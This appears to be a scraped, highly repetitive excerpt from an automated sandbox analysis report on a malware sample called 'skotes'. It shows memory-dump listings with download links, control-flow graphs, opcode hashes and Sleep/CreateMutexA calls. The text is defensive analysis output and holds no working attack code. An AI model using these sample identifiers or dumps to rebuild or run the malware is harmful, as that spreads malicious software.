                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 4fb399c0b5e1814917c143e17f4ce067f7a242681289b1363b6becee7f981565
                                                                                                                                                                                                                                                  • Instruction ID: d1e26ec848609b9199c6c75ded499ab8dbab3c665939078900ce34d9e0aff01d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fb399c0b5e1814917c143e17f4ce067f7a242681289b1363b6becee7f981565
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C312A31B051048BEB08DB79DC89B6DB762EFC5334F288618E494EB3D5C7398981EB12

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 202 f3a682-f3a6a2 206 f3a6d0-f3a6ec 202->206 207 f3a6a4-f3a6b0 202->207 210 f3a71a-f3a739 206->210 211 f3a6ee-f3a6fa 206->211 208 f3a6b2-f3a6c0 207->208 209 f3a6c6-f3a6cd call f4d663 207->209 208->209 212 f3a949 208->212 209->206 216 f3a767-f3a916 call f480c0 210->216 217 f3a73b-f3a747 210->217 214 f3a710-f3a717 call f4d663 211->214 215 f3a6fc-f3a70a 211->215 221 f3a94e 212->221 222 f3a949 call f66c6a 212->222 214->210 215->212 215->214 223 f3a749-f3a757 217->223 224 f3a75d-f3a764 call f4d663 217->224 225 f3a953-f3a994 Sleep CreateMutexA 221->225 226 f3a94e call f66c6a 221->226 222->221 223->212 223->224 224->216 234 f3a9a7-f3a9a8 225->234 235 f3a996-f3a998 225->235 226->225 235->234 236 f3a99a-f3a9a5 235->236 236->234
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: bf553fc402de2f4c6a19de1c715cbefddf5da28cc10998b90e298a9c3564dd5e
                                                                                                                                                                                                                                                  • Instruction ID: 844ebd5cc1320c15ee4e90085e533fb4a0f9c7c9327ae535ac289d9464317d7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf553fc402de2f4c6a19de1c715cbefddf5da28cc10998b90e298a9c3564dd5e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1312A31B052049BEB08DB79DCC9B6DB762EBC5334F248618E454EB3D1D7398980EB52

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 238 f39adc-f39ae8 239 f39aea-f39af8 238->239 240 f39afe-f39b27 call f4d663 238->240 239->240 241 f3a917 239->241 248 f39b55-f39b57 240->248 249 f39b29-f39b35 240->249 243 f3a953-f3a994 Sleep CreateMutexA 241->243 244 f3a917 call f66c6a 241->244 252 f3a9a7-f3a9a8 243->252 253 f3a996-f3a998 243->253 244->243 250 f39b65-f39d91 call f47a00 call f35c10 call f38b30 call f48220 call f47a00 call f35c10 call f38b30 call f48220 248->250 251 f39b59-f3a916 call f480c0 248->251 254 f39b37-f39b45 249->254 255 f39b4b-f39b52 call f4d663 249->255 253->252 259 f3a99a-f3a9a5 253->259 254->241 254->255 255->248 259->252
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: cb0b3a40170098d386a6f9156b25cd69c63599deea8174585253b79001b90f40
                                                                                                                                                                                                                                                  • Instruction ID: 4716d8d58a080eb815918b25eb85841d5714509fb6e9776e94d600bd10fbe881
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb0b3a40170098d386a6f9156b25cd69c63599deea8174585253b79001b90f40
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79214C317092019BEB189B6CEC89B6DF761EBC1330F244219E454DB3D1D7B58941EA11

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 315 f3a856-f3a86e 316 f3a870-f3a87c 315->316 317 f3a89c-f3a89e 315->317 318 f3a892-f3a899 call f4d663 316->318 319 f3a87e-f3a88c 316->319 320 f3a8a0-f3a8a7 317->320 321 f3a8a9-f3a8b1 call f37d30 317->321 318->317 319->318 322 f3a94e 319->322 324 f3a8eb-f3a916 call f480c0 320->324 332 f3a8b3-f3a8bb call f37d30 321->332 333 f3a8e4-f3a8e6 321->333 326 f3a953-f3a987 Sleep CreateMutexA 322->326 327 f3a94e call f66c6a 322->327 334 f3a98e-f3a994 326->334 327->326 332->333 339 f3a8bd-f3a8c5 call f37d30 332->339 333->324 337 f3a9a7-f3a9a8 334->337 338 f3a996-f3a998 334->338 338->337 340 f3a99a-f3a9a5 338->340 339->333 344 f3a8c7-f3a8cf call f37d30 339->344 340->337 344->333 347 f3a8d1-f3a8d9 call f37d30 344->347 347->333 350 f3a8db-f3a8e2 347->350 350->324
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: fc3220d1c052680486b0f1660a08b96f0eb7c2d8ab4f2b8bc43d0b0333d51ae6
                                                                                                                                                                                                                                                  • Instruction ID: fa07f058ff8fe19f39ed34818ff9fa08d7f63821f52fe037f48d3c87c03dddc3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc3220d1c052680486b0f1660a08b96f0eb7c2d8ab4f2b8bc43d0b0333d51ae6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E217C717492058AFB28776E9C9AB3DB352DFC1330F240816E5C4D73D1CA7A8981B693

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 292 f3a34f-f3a35b 293 f3a371-f3a39a call f4d663 292->293 294 f3a35d-f3a36b 292->294 300 f3a3c8-f3a916 call f480c0 293->300 301 f3a39c-f3a3a8 293->301 294->293 295 f3a93a 294->295 297 f3a953-f3a994 Sleep CreateMutexA 295->297 298 f3a93a call f66c6a 295->298 308 f3a9a7-f3a9a8 297->308 309 f3a996-f3a998 297->309 298->297 302 f3a3aa-f3a3b8 301->302 303 f3a3be-f3a3c5 call f4d663 301->303 302->295 302->303 303->300 309->308 312 f3a99a-f3a9a5 309->312 312->308
                                                                                                                                                                                                                                                  APIs
